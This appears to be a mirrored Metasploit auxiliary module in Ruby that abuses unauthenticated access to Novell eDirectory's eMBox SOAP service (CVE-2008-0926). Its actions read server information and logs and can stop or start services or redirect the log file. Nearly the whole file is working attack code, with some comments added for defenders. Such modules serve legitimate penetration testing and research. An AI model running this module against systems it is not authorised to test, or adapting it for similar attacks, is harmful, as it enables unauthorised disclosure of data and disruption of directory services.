Mirror of metasploit

edirectory_edirutil.rb 5.0KB

  1. ##
  2. # This module requires Metasploit: https://metasploit.com/download
  3. # Current source: https://github.com/rapid7/metasploit-framework
  4. ##
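  # Auxiliary module that talks to the Novell eDirectory eMBox SOAP endpoint
  # without authenticating first (see the CVE/BID/OSVDB entries in 'References').
  #
  # Each action is one HTTP POST to /SOAP on RPORT (default 8028) whose body is
  # a SOAP envelope containing <dispatch><Action>CMD</Action>. The reply is
  # expected to carry a single base64-encoded element, matched by the action's
  # 'PATTERN', which is decoded and printed.
  #
  # Notes for defenders, derived from the request this code builds:
  # * The fixed URI (/SOAP), the port and the <Action> command names listed in
  #   'Actions' are the stable parts of the request; the SOAPAction header is
  #   random on every run and is not a usable indicator.
  # * STOP_SERVICE, START_SERVICE and SET_LOGFILE send a caller-supplied value
  #   and, going by their command names, change server state; the remaining
  #   actions only read.
  # * Restricting which hosts can reach the eMBox port and applying the vendor
  #   fix for the referenced CVE are the relevant mitigations.
  class MetasploitModule < Msf::Auxiliary
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient

    # Registers module metadata, the table of supported actions and the
    # datastore options (RPORT and the optional PARAM).
    #
    # Every action entry carries:
    #   'CMD'       - value placed in the SOAP <Action> element
    #   'PATTERN'   - regexp whose first capture is the base64 payload of the reply
    #   'USE_PARAM' - whether the PARAM option is mandatory for the action
    #   'PARAM'     - XML fragment in which __PARAM__ is replaced by the option
    #
    # @param info [Hash] metadata overrides forwarded to update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'Novell eDirectory eMBox Unauthenticated File Access',
        'Description'    => %q{
          This module will access Novell eDirectory's eMBox service and can run the
          following actions via the SOAP interface: GET_DN, READ_LOGS, LIST_SERVICES,
          STOP_SERVICE, START_SERVICE, SET_LOGFILE.
        },
        'References'     =>
          [
            [ 'CVE', '2008-0926' ],
            [ 'BID', '28441' ],
            [ 'OSVDB', '43690' ]
          ],
        'Author'         =>
          [
            'Nicob',
            'MC', # Initial Metasploit module
            'sinn3r'
          ],
        'License'        => MSF_LICENSE,
        'Actions'        =>
          [
            [
              'GET_DN',
              {
                'Description' => 'Get DN',
                'CMD'         => 'novell.embox.connmgr.serverinfo',
                'PATTERN'     => /<ServerDN dt="Binary">(.*)<\/ServerDN>/,
                'USE_PARAM'   => false
              }
            ],
            [
              'READ_LOGS',
              {
                'Description' => 'Read all the log files',
                'CMD'         => 'logger.readlog',
                'PATTERN'     => /<LogFileData>(.*)<\/LogFileData>/,
                'USE_PARAM'   => false
              }
            ],
            [
              'LIST_SERVICES',
              {
                'Description' => 'List services',
                'CMD'         => 'novell.embox.service.getServiceList',
                'PATTERN'     => /<DSService:Message dt=\"Binary\">(.*)<\/DSService:Message>/,
                'USE_PARAM'   => false
              }
            ],
            [
              'STOP_SERVICE',
              {
                'Description' => 'Stop a service',
                'CMD'         => 'novell.embox.service.stopService',
                'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
                'PARAM'       => '<Parameters><params xmlns:DSService="service.dtd">' +
                                 '<DSService:moduleName>__PARAM__</DSService:moduleName>' +
                                 '</params></Parameters>',
                'USE_PARAM'   => true
              }
            ],
            [
              'START_SERVICE',
              {
                'Description' => 'Start a service',
                'CMD'         => 'novell.embox.service.startService',
                'PATTERN'     => /<DSService:Message dt="Binary">(.*)<\/DSService:Message>/,
                'PARAM'       => '<Parameters>' +
                                 '<params xmlns:DSService="service.dtd">' +
                                 '<DSService:moduleName>__PARAM__</DSService:moduleName>' +
                                 '</params></Parameters>',
                'USE_PARAM'   => true
              }
            ],
            [
              'SET_LOGFILE',
              {
                # NOTE(review): the description reads 'Read Log File' although the
                # command is logger.setloginfo - confirm the intended wording.
                'Description' => 'Read Log File',
                'CMD'         => 'logger.setloginfo',
                'PATTERN'     => /<Logger:Message dt="Binary">(.*)<\/Logger:Message>/,
                'PARAM'       => '<Parameters><params><logFile>__PARAM__</logFile>' +
                                 '<logOptionAppend/></params></Parameters>',
                'USE_PARAM'   => true
              }
            ]
          ],
        'DefaultAction'  => 'LIST_SERVICES'
      ))

      register_options(
        [
          Opt::RPORT(8028),
          OptString.new("PARAM", [false, 'Specify a parameter for the action'])
        ])
    end

    # Sends the selected action to the eMBox SOAP endpoint and prints the
    # base64-decoded payload of the reply.
    #
    # Returns early, after printing an error, when a required PARAM is missing,
    # when no response arrives, or when the response does not contain the
    # element the action's 'PATTERN' looks for. The last check was missing
    # before: an unmatched response passed nil to the base64 decoder.
    #
    # @return [void]
    def run
      if action.opts['USE_PARAM']
        value = datastore['PARAM']
        if value.nil? || value.empty?
          print_error("You must supply a parameter for action: #{action.name}")
          return
        end
        # PARAM is inserted verbatim into the XML fragment; it is not escaped.
        param = action.opts['PARAM'].gsub(/__PARAM__/, value)
      else
        param = '<Parameters><params/></Parameters>'
      end

      # The envelope is assembled from fragments so the bytes on the wire do not
      # depend on how this source file is indented.
      template = [
        '<?xml version="1.0"?>',
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">',
        '<SOAP-ENV:Header/>',
        '<SOAP-ENV:Body>',
        '<dispatch>',
        "<Action>#{action.opts['CMD']}</Action>",
        "<Object/>#{param}</dispatch>",
        '</SOAP-ENV:Body>',
        '</SOAP-ENV:Envelope>'
      ].join

      # Same normalisation as before, so a multi-line PARAM is flattened in
      # exactly the same way.
      template = template.gsub(/^ {4}/, '').gsub(/\n/, '')

      connect
      begin
        print_status("Sending command: #{action.name}...")

        res = send_request_cgi({
          'method'  => 'POST',
          'uri'     => '/SOAP',
          'data'    => template + "\n\n",
          'headers' =>
            {
              'Content-Type' => 'text/xml',
              # Random quoted value, 1 to 25 upper-case letters, new on every run.
              'SOAPAction'   => "\"" + Rex::Text.rand_text_alpha_upper(rand(25) + 1) + "\"",
            }
        }, 25)

        if res.nil?
          print_error("Did not get a response from server")
          return
        end

        # First capture group of the action's pattern; nil when the reply does
        # not contain the expected element (error page, patched service, ...).
        raw_data = res.body.to_s.scan(action.opts['PATTERN']).flatten.first
        if raw_data.nil?
          print_error("Response did not contain the expected data for action: #{action.name}")
          return
        end

        print_line("\n" + Rex::Text.decode_base64(raw_data))
      ensure
        # Runs on every exit path after connect, including the early returns above.
        disconnect
      end
    end
  end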